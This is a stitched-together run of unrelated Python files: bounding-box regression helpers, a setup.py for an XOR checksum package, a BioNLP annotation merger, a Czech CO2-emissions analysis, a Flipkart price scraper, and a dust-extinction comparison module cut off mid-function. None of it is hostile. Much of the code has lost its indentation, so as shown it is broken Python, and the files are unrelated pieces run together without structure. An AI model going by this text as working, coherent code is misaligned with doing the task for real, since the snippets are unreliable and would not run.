h = boxes[:, 3] - boxes[:, 1] + 1
ctr_x = boxes[:, 0] + 0.5 * w
ctr_y = boxes[:, 1] + 0.5 * h
scaled_w = w * alpha
scaled_h = h * alpha
scaled_boxes = np.zeros(boxes.shape, dtype=boxes.dtype)
scaled_boxes[:, 0] = ctr_x - 0.5 * scaled_w
scaled_boxes[:, 1] = ctr_y - 0.5 * scaled_h
scaled_boxes[:, 2] = ctr_x + 0.5 * scaled_w
scaled_boxes[:, 3] = ctr_y + 0.5 * scaled_h
return scaled_boxes
def bbox_compute_targets(ex_rois, gt_rois, normalize):
"""
Compute bounding-box regression targets for an image
Parameters:
-----------
ex_rois: ROIs from external source (anchors or proposals)
gt_rois: ground truth ROIs
    normalize: whether to normalize the targets (RPN doesn't need normalization)
Returns:
-----------
Relative value for anchor or proposals
"""
assert ex_rois.shape == gt_rois.shape
targets = bbox_transform(ex_rois, gt_rois)
if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED and normalize:
# Optionally normalize targets by a precomputed mean and std
targets = ((targets - np.array(cfg.TRAIN.BBOX_NORMALIZE_MEANS)) /
np.array(cfg.TRAIN.BBOX_NORMALIZE_STDS))
return targets.astype(np.float32, copy=False)
def get_bbox_regression_label(bbox_target_data, num_class):
"""Bounding-box regression targets (bbox_target_data) are stored in a
compact form N x (class, tx, ty, tw, th)
This function expands those targets into the 4-of-4*K representation used
by the network (i.e. only one class has non-zero targets).
Returns:
bbox_target (ndarray): N x 4K blob of regression targets
bbox_inside_weights (ndarray): N x 4K blob of loss weights
"""
assert bbox_target_data.shape[1] == 5
clss = bbox_target_data[:, 0]
bbox_targets = np.zeros((clss.size, 4 * num_class), dtype=np.float32)
bbox_inside_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
inds = np.where(clss > 0)[0]
for ind in inds:
        cls = int(clss[ind])
start = 4 * cls
end = start + 4
bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]
bbox_inside_weights[ind, start:end] = cfg.TRAIN.BBOX_INSIDE_WEIGHTS
return bbox_targets, bbox_inside_weights
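
# Illustrative self-check sketch (hypothetical usage, only runnable inside the repo
# since the module-level imports need utils.cython_bbox and mnc_config): shows how
# bbox_transform and bbox_transform_inv relate, including the one-pixel offset on
# x2/y2 that comes from the "+ 1.0" width/height convention used above.
if __name__ == '__main__':
    ex = np.array([[10., 10., 50., 60.]])
    gt = np.array([[12., 8., 56., 66.]])
    deltas = bbox_transform(ex, gt)     # (dx, dy, dw, dh) for the single pair
    rec = bbox_transform_inv(ex, deltas)
    # prints roughly [[12.  8. 57. 67.]]: x1/y1 match gt, while x2/y2 come back one
    # pixel larger because widths/heights are defined as x2 - x1 + 1.
    print(rec)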
|
from setuptools import setup
NAME = 'XOR_CheckSum_zsd'
VERSION = '1.0.7'
URL = 'https://github.com/zhangsheng377/XOR_CheckSum_zsd'
KEYWORDS = 'XOR checksum string zsd'
EMAIL = '435878393@qq.com'
DESCRIPTION = 'XOR_CheckSum tools'
LONG_DESCRIPTION = '''
\>\>\> from XOR_CheckSum import xor_checksum_string
\>\>\> xor_checksum_string('CCICA,0,00')
123
\>\>\> hex(xor_checksum_string('CCICA,0,00'))
'0x7b'
\>\>\> hex(xor_checksum_string('CCICA,0,00', encoding="utf-8"))
'0x7b'
\>\>\> hex(xor_checksum_string('CCICA,0,00', encoding="utf-16"))
'0x7a'
'''
REQUIRES = []
PACKAGES = ['XOR_CheckSum']
setup(
name=NAME,
author='zhangsheng377',
license='MIT',
zip_safe=False,
url=URL,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author_email=EMAIL,
keywords=KEYWORDS,
install_requires=REQUIRES,
packages=PACKAGES,
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
|
#!/usr/bin/env python
# -*- Mode: Python; tab-width: 4; indent-tabs-mode: nil; coding: utf-8; -*-
# vim:set ft=python ts=4 sw=4 sts=4 autoindent:
from __future__ import with_statement
'''
Merge BioNLP Shared Task annotation format into a single annotation file.
find data -name '*.a1' -o -name '*.a2' -o -name '*.rel' -o -name '*.co' \
| ./merge.py
Author: Pontus Stenetorp
Version: 2011-01-17
'''
from collections import defaultdict
from os.path import join as join_path
from os.path import split as split_path
from shlex import split as shlex_split
from sys import stderr, stdin
from subprocess import Popen, PIPE
try:
from argparse import ArgumentParser
except ImportError:
    from os.path import dirname
from sys import path as sys_path
# We are most likely on an old Python and need to use our internal version
    sys_path.append(join_path(dirname(__file__), '../server/lib'))
from argparse import ArgumentParser
### Constants
#TODO: Add to options?
UNMERGED_SUFFIXES=['a1', 'a2', 'co', 'rel']
#TODO: Add to options?
MERGED_SUFFIX='ann'
ARGPARSER = ArgumentParser(description=("Merge BioNLP'11 ST annotations "
'into a single file, reads paths from stdin'))
ARGPARSER.add_argument('-w', '--no-warn', action='store_true',
help='suppress warnings')
#ARGPARSER.add_argument('-d', '--debug', action='store_true',
# help='activate additional debug output')
###
def keynat(string):
'''
http://code.activestate.com/recipes/285264-natural-string-sorting/
'''
it = type(1)
r = []
for c in string:
if c.isdigit():
d = int(c)
if r and type( r[-1] ) == it:
r[-1] = r[-1] * 10 + d
else:
r.append(d)
else:
r.append(c.lower())
return r
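# e.g. keynat('file10.a2') -> ['f', 'i', 'l', 'e', 10, '.', 'a', 2], so that
# 'file2' sorts before 'file10' when these keys are used with sorted(key=keynat).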
def main(args):
argp = ARGPARSER.parse_args(args[1:])
# ID is the stem of a file
id_to_ann_files = defaultdict(list)
    # Index all IDs before we merge so that we can do a little magic
for file_path in (l.strip() for l in stdin):
if not any((file_path.endswith(suff) for suff in UNMERGED_SUFFIXES)):
if not argp.no_warn:
import sys
print >> sys.stderr, (
'WARNING: invalid file suffix for %s, ignoring'
) % (file_path, )
continue
dirname, basename = split_path(file_path)
id = join_path(dirname, basename.split('.')[0])
id_to_ann_files[id].append(file_path)
for id, ann_files in id_to_ann_files.iteritems():
#XXX: Check if output file exists
lines = []
for ann_file_path in ann_files:
with open(ann_file_path, 'r') as ann_file:
for line in ann_file:
lines.append(line)
with open(id + '.' + MERGED_SUFFIX, 'w') as merged_ann_file:
for line in lines:
merged_ann_file.write(line)
if __name__ == '__main__':
from sys import argv
exit(main(argv))
|
# imports
#region
import os
import pyreadstat
import pandas as pd
import numpy as np
from statsmodels.stats.weightstats import DescrStatsW
from sklearn.linear_model import LinearRegression
import statsmodels.api as sm
import statsmodels.formula.api as smf
import seaborn as sns
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from libs.utils import *
from libs.plots import *
from libs.extensions import *
plt.ioff()
#endregion
root = 'D:\\projects\\fakta-o-klimatu\\work\\111-emise-svet-srovnani\\data'
edgar_files = ['CH4', 'CO2_excl_short-cycle_org_C', 'CO2_org_short-cycle_C', 'N2O']
ef = edgar_files[0]
data = []
for ef in edgar_files:
logger(ef)
ey = 2018 if ef == 'CO2_excl_short-cycle_org_C' else 2015
frame = pd.read_excel(f'{root}\\edgar_v5.0\\v50_{ef}_1970_{ey}.xls', sheet_name='TOTALS BY COUNTRY',
header=9)
frame = frame[['ISO_A3'] + list(range(1970, ey + 1))].rename(columns={'ISO_A3': 'code'}).set_index('code')
data.append(frame)
# data.append(np.sum(frame.T, axis=1).rename(ef))
df = data[1]
# so here I have edgar CO2 up to 2018
# what do I want to do with it?
countries = pd.read_csv('D:\\projects\\fakta-o-klimatu\\work\\emission-intensity\\countries.csv')
countries.show()
countries = countries.rename(columns={'country_name': 'country', 'final_region': 'cont', 'final_region_en': 'cont_en',
'second_chart_region': 'region'}).drop(columns=['world_bank_region', 'wiki_region', 'final_region_full'])
regions = countries[['code', 'final_region']].rename(columns={'final_region': 'region'})
selected = ['Čína', 'Evropská unie', 'Indie', 'Rusko', 'Spojené státy americké']
regions = regions[regions.region.isin(selected)].copy()
# what about Great Britain?
regions = regions.query('code != "GBR"').reset_index(drop=True).copy()
regions.shape
regions.show()
df = pd.merge(regions, df.reset_index())
df.show()
cze = df.iloc[[0]].copy()
cze.loc[0, 'region'] = 'Česká republika'
co2 = pd.concat([df, cze]).drop(columns=['code']).set_index('region').groupby('region').apply(lambda x: x.sum(axis=0)) \
.sort_index()
import world_bank_data as wb
pop = wb.get_series('SP.POP.TOTL', id_or_value='id')
pop = pop.unstack().reset_index().drop(columns=['Series']).rename(columns={'Country': 'code'})
pop = pd.merge(regions, pop)
pop.show()
cze = pop.query('code == "CZE"').copy()
cze.loc[:, 'region'] = 'Česká republika'
pop = pd.concat([pop, cze]).drop(columns=['code']).set_index('region').groupby('region').apply(lambda x: x.sum(axis=0))
pop = pop[[str(i) for i in range(1970, 2019)]].sort_index()
pop.columns = [int(i) for i in pop.columns]
co2_per_capita = 1e3 * co2 / pop
co2 = co2 / 1e6
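# Units sanity check (assuming the EDGAR v5.0 totals are reported in Gg = kt):
# 1e3 * Gg / person = t CO2 per person, and dividing the totals by 1e6 turns Gg
# into Gt, which matches the 'Gt CO2' axis label used for the plot below.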
covered = co2[2018].sum()
world = data[1][2018].sum()
covered / world
output = 'D:\\projects\\fakta-o-klimatu\\work\\respekt-data\\regiony\\'
co2.to_csv(output + 'regiony_co2.csv')
pop.to_csv(output + 'regiony_pop.csv')
co2_per_capita.to_csv(output + 'regiony_co2_per_capita.csv')
df = pd.merge(regions, df.reset_index(), how='right')
df['region'] = df['region'].fillna('Ostatní')
co2 = df.drop(columns=['code']).set_index('region').groupby('region').apply(lambda x: x.sum(axis=0)).sort_index()
co2 = co2 / 1e6
ax = co2.T.plot.area(lw=0)
ax.set(xlabel='Rok', ylabel='Gt CO2', title='Světové roční emise CO2')
ax.show()
co2.to_csv(output + 'regiony_co2.csv')
|
import requests
from bs4 import BeautifulSoup
import lxml
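# Note: the CSS class names used below ("B_NuCI" for the product title and
# "_30jeq3 _16Jk6d" for the price) are Flipkart's generated class names and tend to
# change; when they do, soup.find() returns None and .get_text() raises AttributeError.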
url = 'https://www.flipkart.com/msi-gf63-thin-core-i5-10th-gen-8-gb-1-tb-hdd-windows-10-home-4-gb-graphics-nvidia-geforce-gtx-1650-max-q-60-hz-10scxr-1618in-gaming-laptop/p/itm76993f27ad4bd?pid=COMG2K9ZJWWV2BGX&lid=LSTCOMG2K9ZJWWV2BGXWYR6AP&marketplace=FLIPKART&store=6bo%2Fb5g&srno=b_1_2&otracker=hp_omu_Top%2BOffers_3_4.dealCard.OMU_XI2Q41K7XRAJ_3&otracker1=hp_omu_PINNED_neo%2Fmerchandising_Top%2BOffers_NA_dealCard_cc_3_NA_view-all_3&fm=neo%2Fmerchandising&iid=en_88xLC9tozPrlDC3p08xWvF4be%2F6nOdXkruYGuVEr5o%2B1AJkflbHBXnuhJkfHoUbEVfGT0brMXc7Q5HqI%2FaaGdQ%3D%3D&ppt=hp&ppn=homepage&ssid=449d8hrxog0000001628232917865'
def get_url_link(url):
headers = {
"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
"Accept-Language": "en",
}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, "lxml")
title = soup.find("span", {"class": "B_NuCI"}).get_text()
price = float(soup.find("div", {"class": "_30jeq3 _16Jk6d"}).get_text()[1:].replace(',', ''))
return title,price
print(get_url_link(url))
|
#
# compareExtinctions.py
#
# Authors: Will Clarkson (UM-Dearborn) and Alessandro Mazzi (INAF)
# Started 2021-04-02
#
#
# Use Bovy's dustmaps and Alessandro Mazzi's STILISM_LOCAL.py to
# compare the lallement and bovy extinction predictions for a
# particular sight line.
#
# Bovy et al.'s mwdust and Mazzi's stilism_local must both be importable
import mwdust
import stilism_local
# If we want to query planck2d for every sightline, not just those we
# tabulated
try:
from dustmaps.planck import PlanckQuery
PLANCK_2D = PlanckQuery()
except:
PLANCK_2D = None
# Standard methods
import numpy as np
# for timings
import time
# For filename operations and optional directory creation
import os, glob
# To space the samples out in equatorial rather than galactic
from astropy.coordinates import SkyCoord
from astropy import units as u
from astropy.io import fits
# To determine spacings for samples about a central sight line
import healpy as hp
import matplotlib.pylab as plt
import matplotlib.gridspec as gridspec
plt.ion()
class lineofsight(object):
"""Evaluates E(B-V) vs distance for a particular line of sight. The
bovy et al. 2019 combined map can be passed in (as argument objBovy)
or can be re-imported here."""
def __init__(self, l=0., b=4., \
distMaxPc=8000, distMinPc=0.5, distStepPc=10, \
distances=np.array([]), \
objBovy = None, Rv=3.1, \
objL19=None, \
distMaxCoarsePc = 17500., \
nDistBins = 400,
map_version='19'):
# Sight line, max distance
self.l = l
self.b = b
self.distMaxPc = distMaxPc
self.distMinPc = distMinPc
self.distStepPc = distStepPc
# Maximum overall distance, *IF* we are using a coarser set of
# bins for the bovy et al. distances than for the L19
# distances.
self.distMaxCoarsePc = distMaxCoarsePc
# If we are generating distances to fit in a larger scheme
# (where we need the same number of bins in every sight line),
# we will need to enforce the total number of bins. If we're
# letting stilism_local generate distances, this quantity is
# ignored.
self.nDistBins = nDistBins
        # Conversion factor from A_555 to E(B-V)
self.Rv=Rv
# Distances generated by stilism_local, maximum distance along
# this sight line for stilism_local
if np.size(distances) > 0:
self.distsPc = np.copy(distances)
else:
self.distsPc = np.array([])
self.distLimPc = 1e9 # initialize very high
# Map-relevant quantities follow.
self.planckValue = 0. # planck 2d query at this sight line.
# bovy et al. distance model - if not initialised
if objBovy is None:
self.objBovy = mwdust.Combined19()
else:
self.objBovy = objBovy
# extinction evaluates
self.ebvL19 = np.array([])
self.ebvBovy = np.array([])
# Set up L19 map
# the version of LallementDustMap must be either '18' or '19',
# as string
if objL19 is None:
self.lallementMap \
= stilism_local.LallementDustMap(version=map_version,Rv=Rv)
else:
self.lallementMap = objL19
def generateDistances(self, Verbose=False):
"""Generates a distance array appropriate for this sight
    line. Fine-grained distances are used over the range in which L+19 is
    defined; beyond that, the method switches to a coarse-grained set of
    distances for Bovy et al.
"""
# Generate an array of "fine-grained" distances
distsFine = stilism_local.generate_distances(self.distMaxPc,
self.distMinPc, \
self.distStepPc)
# Find the maximum distance that fits inside the L19
# volume. Currently the routine in stilism_local returns the
# boolean and the xyz coords since those are needed for the
# interpolation. We don't need those quantities here, though.
distMax, _, _ = self.lallementMap.find_max_distance(self.l, self.b, \
distsFine)
# OK now we set the maximum distance for the "fine" set of the
# distances, adding a few steps onto the end to allow for
# neighboring sight lines to take different paths through the
# cube.
self.distLimPc = distMax + 5*self.distStepPc
# Now we generate the "fine" and "coarse" distance arrays and
# abut them together.
distsClose = stilism_local.generate_distances(self.distLimPc, \
self.distMinPc, \
self.distStepPc)
# we have to determine the coarse step size dynamically too.
nBinsFar = self.nDistBins - np.size(distsClose)
# What we do if we sent in too few bins to begin with needs
# some thought... I think for the moment it's better to warn
# and extend the footprint in this case. We use a conditional
# so that we can put the warning in (rather than use np.min()
# in the above line). We could put in a conditional for
# whether we actually want to do this (rather than just
# crashing), but for the moment let's ensure this actually
# does run all the way through...
if nBinsFar < 0:
print("generateDistances WARN - nFine > nTotal. Extending the coarse array to 10 elements. This may not be what you want...")
nBinsFar = 10
# We want the arrays to mesh more or less seamlessly. Here's
# how: we use linspace to take the maximum close distance out
# to the maximum total distance, WITHOUT the endpoints. Then
# we find the step resulting and shift the array by that
# distance.
distsFar = np.linspace(np.max(distsClose), self.distMaxCoarsePc, \
nBinsFar, endpoint=False)
# Update the step size and shift the coarse array by one step
self.distStepCoarsePc = distsFar[1] - distsFar[0]
distsFar += self.distStepCoarsePc
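        # Small numeric illustration of the scheme above: with max(distsClose)=3000,
        # distMaxCoarsePc=5000 and nBinsFar=4, linspace(..., endpoint=False) gives
        # [3000, 3500, 4000, 4500]; the step is 500, so the shift yields
        # [3500, 4000, 4500, 5000], which abuts distsClose without repeating 3000.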
#distMinFar = np.max(distsClose)+self.distStepCoarsePc
#distsFar = np.linspace(distMinFar, self.distMaxCoarsePc, nBinsFar, \
# endpoint=True)
self.distsPc = np.hstack(( distsClose, distsFar ))
# Ensure the limits sent to stilism_local are consistent with
# this. If we're sending stilism a distance array then those
# values should be ignored anyway, but it doesn't hurt to make
# them consistent.
self.distMinPc = np.min(self.distsPc)
self.distMaxPc = np.max(self.distsPc)
self.distStepPc = (self.distMaxPc - self.distMinPc) \
/ np.size(self.distsPc)
if Verbose:
nbins = np.size(self.distsPc)
stepFine = distsClose[1] - distsClose[0]
stepFar = distsFar[1] - distsFar[0]
print("lineofsight.generateDistances INFO - nbins %i, fine step %.3f, coarse step %.3f" % (nbins, stepFine, stepFar))
def getLallementEBV(self):
"""Evaluates the Lallement+19 extinction"""
# we supply the get_ebv_lallement routine with our array of
# distances. If it's zero length, get_ebv_lallement will
# generate its own. Otherwise it uses the values we
# supply. This leads to an apparently redundant set of
# keywords in the call.
l19, dists, distLim \
= self.lallementMap.get_ebv(self.l, self.b, \
self.distMaxPc, \
self.distMinPc, \
self.distStepPc, \
distances=self.distsPc)
# Pass the l19 values, converted to E(B-V)
## new 2021-04-05: not needed since LallementDustMap handles conversion automatically
#self.ebvL19 = l19 / self.Rv
self.ebvL19 = l19
# pass the distance array generated to the instance, IF it
# wasn't already generated.
if np.size(self.distsPc) < 1:
self.distsPc = np.copy(dists)
self.distLimPc = np.copy(distLim)
def getBovyEBV(self):
"""Evaluates Bovy et al. E(B-V) for this sight line"""
self.ebvBovy = self.objBovy(self.l, self.b, self.distsPc/1000.)
# extinctions cannot be negative
bLo = self.ebvBovy < 0.
self.ebvBovy[bLo] = 0.
def getPlanck2D(self):
"""Gets the 2D planck value of the extinction for this sightline, if
dustmaps is present."""
# Do nothing if the dustmaps.planck is not on the system
if PLANCK_2D is None:
return
# planck2d expects astropy skycoo coordinates. Although the
# method that called this instance may already have the coords
# developed, it should be quick to generate one here.
coo = SkyCoord(self.l*u.deg, self.b*u.deg, frame='galactic')
self.planckValue = PLANCK_2D(coo)
def showLos(self, ax=None, alpha=1.0, lw=1, zorder=5, \
noLabel=False, \
showPoints=False):
"""Adds a plot for the line of sight to the current axis"""
# start an axis if one was not supplied
newAx = False
if ax is None:
fig1 = plt.figure(1)
fig1.clf()
ax = fig1.add_subplot(111)
newAx = True
# hack for the labels
labl19 = 'L+19'
lablBov = 'Bovy'
if noLabel:
labl19 = ''
lablBov = ''
# show the points?
marker=None
markerB=None
if showPoints:
marker='o'
markerB='s'
b19 = self.distsPc <= self.distLimPc
dumLlo = ax.plot(self.distsPc[b19], self.ebvL19[b19], 'k-', \
label=labl19, \
alpha=alpha, lw=lw, zorder=zorder, \
marker=marker, ms=2)
dumLhi = ax.plot(self.distsPc[~b19], self.ebvL19[~b19], 'k--', \
alpha=alpha, lw=lw, zorder=zorder, \
marker=marker, ms=1)
dumBo = ax.plot(self.distsPc, self.ebvBovy, 'r-', \
label=lablBov, \
alpha=alpha, lw=lw, zorder=zorder+1, \
marker=markerB, ms=1)
# if we are doing a new axis, decorate it
if not newAx:
return
self.decorateAxes(ax)
def showDistMax(self, ax=None):
"""Draw an indicator showing the maximum distance for L19"""
if ax is None:
return
if self.distLimPc > self.distMaxPc:
return
blah = ax.axvline(self.distLimPc, ls='--', color='k', alpha=0.3)
#ymax = np.max(self.ebvL19)
#dum = ax.plot([self.distLimPc, self.distLimPc], [0., ymax], \
#'k--', alpha=0.3)
def decorateAxes(self, ax=None):
"""One-liner to decorate the current plot axes appropriately for the
extinction vs distance plot"""
if ax is None:
return
ax.set_xlabel('Distance (pc)')
ax.set_ylabel('E(B-V)')
ax.grid(which='both', zorder=1, color='0.5', alpha=0.5)
ax.set_title('l=%.2f, b=%.2f' % (self.l, self.b))
#### Test the comparison
def testOneSightline(l=0., b=4., Rv=3.1, useCoarse=False):
"""Try a single sight line"""
# Import the bovy et al. map so we don't have to re-initialize it
# for each sight-line
combined19 = mwdust.Combined19()
los = lineofsight(l, b, objBovy=combined19, Rv=Rv)
if useCoarse:
los.generateDistances(Verbose=True)
los.getLallementEBV()
los.getBovyEBV()
# show the line of sight
los.showLos(showPoints=True)
def hybridSightline(lCen=0., bCen=4., \
nl=4, nb=4, \
maxPc=9000., minPc=0.5, stepPc=25, \
nside=64, \
pixFillFac=1.0, collisionArcmin=2., \
pctUpper=75., pctLower=25., \
Rv=3.1, \
distFrac=1., diffRatioMin=0.5, \
setLimDynamically=False, \
minEBV=1.0e-3, \
minDistL19=1000., \
returnValues = False, \
tellTime=True, \
doPlots=True, \
figName='', \
useTwoBinnings=True, \
nBinsAllSightlines = 500, \
distancesPc = np.array([]), \
hpid=-1, nested=False, \
objBovy=None, \
objL19=None, \
versionL19='19', \
dmaxL19=1e6,\
bridgeL19 = False, \
bridgeWidthL19 = 1000, \
planckMap=None, \
planckUpperLim = 15.):
"""Samples the Bovy et al. and Lallement et al. 2019 E(B-V) vs
distance maps, constructed as the median E(B-V) vs distance curve
over nl x nb samples about the central sight line.
if "returnValues" is set, this returns the E(B-V), distances,
scale factor, and max distance for L19.
A modified version of Alessandro Mazzi's
"stilism_local.py" is used to query Lallement et al. 2019.
REQUIREMENTS beyond the standard numpy and matplotlib:
stilism_local.py: Currently, the script "stilism_local.py" must be
accessible on PYTHONPATH (or be in the current working directory),
and it must be able to locate the "stilism_cube_2.h5" file.
mwdust - Bovy's 3D extinction models and sampler.
healpy - must be present on the system (to convert NSIDE into a
pixel area). If mwdust successfully installed on your system then
you probably already have this.
    If you want to query Planck in all the sight lines, Gregory
    Green's "dustmaps" is also required.
MORE INFO, ARGUMENTS:
The median over all the samples is taken as the E(B-V) curve for
each of the two models. The Lallement et al. 2019 model is scaled to
match the Bovy et al. model at a transition distance. This transition
distance can be determined dynamically or set to a fixed fraction of
the maximum distance of validity of the Lallement et al. 2019
model.
ARGUMENTS:
lCen, bCen = central line of sight, in degrees.
nl, nb = number of points in l, b about which to draw
samples. (The samples will be drawn in a grid (nl x nb) about the
central line of sight.)
maxPc, minPc, stepPc = max, min, stepsize for the distance in
parsecs along the line of sight. (minPc should be small but not
zero: 0.5 pc seems a sensible level to use.)
nside = Healpix NSIDE (used to estimate the side-length for the
square region sampled)
    pixFillFac = fraction of the side-length of the healpix to sample
with our pointings (the default is to sample out to the corners of
the pixel).
collisionArcmin = closest distance a sample can fall to the line
of sight without being rejected as a duplicate of the central line
of sight.
pctUpper, pctLower = lower and upper percentiles for displaying
the variation of E(B-V) within the healpix. (May be ambiguous to
interpret for small (nl x nb).)
Rv = scale factor converting L19's A_555 to E(B-V). Default 3.1.
distFrac = fraction of the L19 maximum distance to use as a
default for the overlap point between L19 and Bovy.
    diffRatioMin = minimum fractional difference between L19 and Bovy
for the two predictions to be considered "discrepant". Used if
estimating the overlap distance dynamically.
setLimDynamically: setting the overlap distance dynamically?
minEBV = minimum value for the Bovy extinction. Bovy points below
this value are ignored.
minDistL19 = minimum acceptable dynamically determined overlap
distance. If the dynamically determined distance is less than this
value, the default (distFrac x max(dist_L19) is used instead.
tellTime = Report screen output, including the timing.
doPlots = prepare plots?
returnValues = return the extinction and distances?
figName = filename for output figure file. If length < 3, no
figure is saved to disk.
useTwoBinnings: Uses finer distance bins for L19 than for Bovy et al., such that the total number of bins is the same for all sight lines.
nBinsAllSightlines = number of bins total for the sightlines
distancesPc = input array of distances in parsecs. If supplied, all the clever distance methods here are ignored in favor of the input distances.
hpid: if >0, then a healpix ID is being supplied, and will
override the choice of l, b. The field center is constructed from
this healpix id.
nested: if using hpids, is this with NESTED? Default is False
because sims_maf seems to use RING by default.
objBovy = bovy et al. dust object. Defaults to None and is
re-initialized in this method. But, could be passed in here too to
save time.
objL19 = Lallement et al. map object. Defaults to None and is
re-initialized in this method using the Rv and versionL19
arguments
versionL19 = Version of Lallement et al. to use if we are
re-initializing L19 here.
dmaxL19 = Maximum distance for Lallement et al. profile. Defaults
to a very large number so the profile up to the intrinsic maximum
distance of the map is used. Setting to zero disables Lallement's
map. Setting instead to a negative value will use Bovy alone if
non-zero for the line of sight, otherwise only Lallement.
bridgeL19 - if True, L19 is taken as "correct", and the E(B-V) is
extended from the value of L+19 at the maximum distance, to the
value of Bovy et al. at the maximum distance plus distance
bridgeWidthL19
bridgeWidthL19 - the distance interval over which the above
extension is to take place.
planckMap = healpix 2d map of Planck E(B-V) predictions. Ignored
if the query coords were not healpix, OR if Green's "dustmaps" is
available on the system.
planckUpperLim = upper limit for planck E(B-V) to be considered
"sensible"
EXAMPLE CALL:
compareExtinctions.hybridSightline(0, 4, figName='test_l0b4_ebvCompare.png', nl=5, nb=5, tellTime=True)
"""
# For our timing report
t0 = time.time()
# generate samples in l, b to sample a typical healpix
pixSideDeg = hp.nside2resol(nside, arcmin=True) / 60.
# how far to the edge of the pixel do we go in our samples?
pixEdge = np.min([pixFillFac, 1.0])
# now we generate the grid of samples
dL = pixSideDeg * pixEdge * np.linspace(-1., 1., nl, endpoint=True)
dB = pixSideDeg * pixEdge * np.linspace(-1., 1., nb, endpoint=True)
# create meshgrid and ravel into 1D arrays
ll, bb = np.meshgrid(dL, dB)
# convert the field center into equatorial so that we can generate
# the samples within the healpix
planckCen = 0.
if hpid < 0:
cooGAL = SkyCoord(lCen*u.deg, bCen*u.deg, frame='galactic')
raCen = cooGAL.icrs.ra.degree
deCen = cooGAL.icrs.dec.degree
else:
raCen, deCen = hp.pix2ang(nside, hpid, nested, lonlat=True)
cooEQ = SkyCoord(raCen*u.degree, deCen*u.degree, frame='icrs')
lCen = cooEQ.galactic.l.degree
bCen = cooEQ.galactic.b.degree
# fudge for wraparound, to use the same scheme as the samples
if lCen > 180:
lCen -= 360.
# do we have a planck map?
if planckMap is not None:
planckCen = planckMap[hpid]
vRA = ll.ravel() + raCen
vDE = bb.ravel() + deCen
# Ensure the coords of the samples actually are on the sphere...
bSampl = (vDE >= -90.) & (vDE <= 90.)
vRA = vRA[bSampl]
vDE = vDE[bSampl]
cooSamples = SkyCoord(vRA*u.deg, vDE*u.deg, frame='icrs')
vL = np.asarray(cooSamples.galactic.l.degree)
vB = np.asarray(cooSamples.galactic.b.degree)
# handle the wraparound
bLhi = vL > 180.
vL[bLhi] -= 360.
#vL = ll.ravel() + lCen
#vB = bb.ravel() + bCen
# knock out any points that are closer than distanceLim to the
# central sight line
offsets = (vL-lCen)**2 + (vB - bCen)**2
bSamplesKeep = (offsets*3600. > collisionArcmin**2) & \
(vB >= -90.) & (vB <= 90.)
if np.sum(bSamplesKeep) < 1:
print("hybridSightline WATCHOUT - no samples kept. Check your line of sight coordinates are valid.")
return
vL = vL[bSamplesKeep]
vB = vB[bSamplesKeep]
# OK now we can proceed. First build the line of sight for the
# center, then repeat for the nearby sight lines. If we already
# initialized the bovy dust object somewhere else, we can pass it
# in. If not initialized, then we initialize here.
if objBovy is None:
combined19 = mwdust.Combined19()
else:
combined19 = objBovy
# L+19 object-oriented map - can be passed in
if objL19 is None:
L19map \
= stilism_local.LallementDustMap(version=versionL19,Rv=Rv)
else:
L19map = objL19
# for our timing report: how long did it take to get this far?
t1 = time.time()
# now build the line of sight
losCen = lineofsight(lCen, bCen, maxPc, minPc, stepPc, \
objBovy=combined19, Rv=Rv, \
objL19=L19map, \
nDistBins=nBinsAllSightlines, \
distances=distancesPc)
# If a distances array was not supplied, AND we want to use our
# two-binning scheme to generate the distances, then generate the
# distances.
if useTwoBinnings and np.size(distancesPc) < 1:
losCen.generateDistances(Verbose=tellTime)
losCen.getLallementEBV()
losCen.getBovyEBV()
losCen.getPlanck2D()
# Set up a figure...
if doPlots:
fig1 = plt.figure(1, figsize=(12,6))
fig1.clf()
fig1.subplots_adjust(wspace=0.3, hspace=0.3)
# let's try using gridspec to customize our layout
gs = fig1.add_gridspec(nrows=2, ncols=3)
ax1 = fig1.add_subplot(gs[:,0:2])
# ax1=fig1.add_subplot(121)
losCen.showLos(ax=ax1, alpha=0.1, lw=2, zorder=10, noLabel=True)
losCen.decorateAxes(ax1)
losCen.showDistMax(ax1)
## Show the planck prediction if we have it
#if losCen.planckValue > 0:
# ax1.axhline(losCen.planckValue, ls='--', \
# label='Planck 2D', color='g')
# construct arrays for all the samples as a function of
# distance. We'll do this vstack by vstack.
stackDist = np.copy(losCen.distsPc) # to ensure they're all the same...
stackL19 = np.copy(losCen.ebvL19)
stackBovy = np.copy(losCen.ebvBovy)
# Any 2D maps we use will only have a single value for each LOS.
stackPlanck2D = np.array([losCen.planckValue])
# now loop through the samples. We pass in the same distance array
# as we used for the central line of sight, IF we are using our
# two-binning scheme.
for iSample in range(np.size(vL)):
distsInput = np.copy(distancesPc) # use input distances if any
# were given.
if useTwoBinnings:
distsInput = losCen.distsPc
losThis = lineofsight(vL[iSample], vB[iSample], \
maxPc, minPc, stepPc, \
objBovy=combined19, \
objL19=L19map, \
Rv=Rv, \
distances=distsInput)
losThis.getLallementEBV()
losThis.getBovyEBV()
losThis.getPlanck2D()
#if doPlots:
# # Show the planck prediction if we have it
# if losThis.planckValue > 0:
# ax1.axhline(losThis.planckValue, ls='--', \
# label='', color='g')
#if doPlots:
# losThis.showLos(ax=ax1, alpha=0.3, lw=1, zorder=3)
# accumulate to the stacks so that we can find the statistics
# across the samples
stackDist = np.vstack(( stackDist, losThis.distsPc ))
stackL19 = np.vstack(( stackL19, losThis.ebvL19 ))
stackBovy = np.vstack(( stackBovy, losThis.ebvBovy ))
# stack any 2D maps we have
stackPlanck2D = np.hstack(( stackPlanck2D, losThis.planckValue ))
# now compute the statistics. We do the median and the upper and
# lower percentiles.
distsMed = np.median(stackDist, axis=0)
ebvL19Med = np.median(stackL19, axis=0)
ebvBovyMed = np.median(stackBovy, axis=0)
# add any 2D extinction arrays we're using. Note that along some
# sightlines (like 0,0), Planck produces very high E(B-V)
